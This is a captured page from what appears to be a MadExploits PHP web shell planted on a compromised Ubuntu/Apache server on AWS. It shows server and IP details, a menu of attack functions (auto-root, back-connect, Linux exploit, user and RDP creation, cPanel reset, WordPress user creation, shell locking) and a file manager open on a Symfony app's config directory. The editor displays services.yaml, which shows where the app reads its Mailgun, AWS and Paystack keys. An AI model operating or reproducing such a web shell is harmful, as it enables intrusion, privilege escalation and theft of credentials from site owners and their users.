Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.188
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mixchief_app /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
packages
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
bootstrap.php
1.81
KB
-rw-rw-r--
bundles.php
902
B
-rw-rw-r--
routes.yaml
78
B
-rw-rw-r--
services.yaml
2.21
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.yaml
# This file is the entry point to configure your own services. # Files in the packages/ subdirectory configure your dependencies. # Put parameters here that don't need to change on each machine where the app is deployed # https://symfony.com/doc/current/best_practices/configuration.html#application-related-configuration parameters: locale: 'en' mailgun_key: '%env(MAILGUN_KEY)%' mailgun_domain: '%env(MAILGUN_DOMAIN)%' aws_key: '%env(AWS_ACCESS_KEY_ID)%' aws_secret: '%env(AWS_SECRET_ACCESS_KEY)%' aws_region: '%env(AWS_DEFAULT_REGION)%' tinify: '%env(TINIFY_KEY)%' paystackPublic: '%env(PAYSTACK_CLIENT)%' paystackSecret: '%env(PAYSTACK_SECRET)%' services: # default configuration for services in *this* file _defaults: autowire: true # Automatically injects dependencies in your services. autoconfigure: true # Automatically registers your services as commands, event subscribers, etc. # makes classes in src/ available to be used as services # this creates a service per class whose id is the fully-qualified class name App\: resource: '../src/*' exclude: '../src/{DependencyInjection,Entity,Migrations,Tests,Kernel.php}' # controllers are imported separately to make sure services can be injected # as action arguments even if you don't extend any base controller class App\Controller\: resource: '../src/Controller' tags: ['controller.service_arguments'] # add more service definitions when explicit configuration is needed # please note that last definitions always *replace* previous ones App\Service\MailgunTransport: arguments: $apiKey: '%mailgun_key%' $domain: '%mailgun_domain%' App\Service\SESEmailClient: arguments: $awsKey: '%aws_key%' $awsSecret: '%aws_secret%' $region: '%aws_region%' App\Service\ImageManager: arguments: $tinifyKey: '%tinify%' $awsClient: '%aws_key%' $awsSecret: '%aws_secret%' $awsRegion: '%aws_region%' App\Service\PaystackHelper: arguments: $publicKey: '%paystackPublic%' $secretKey: '%paystackSecret%'
Close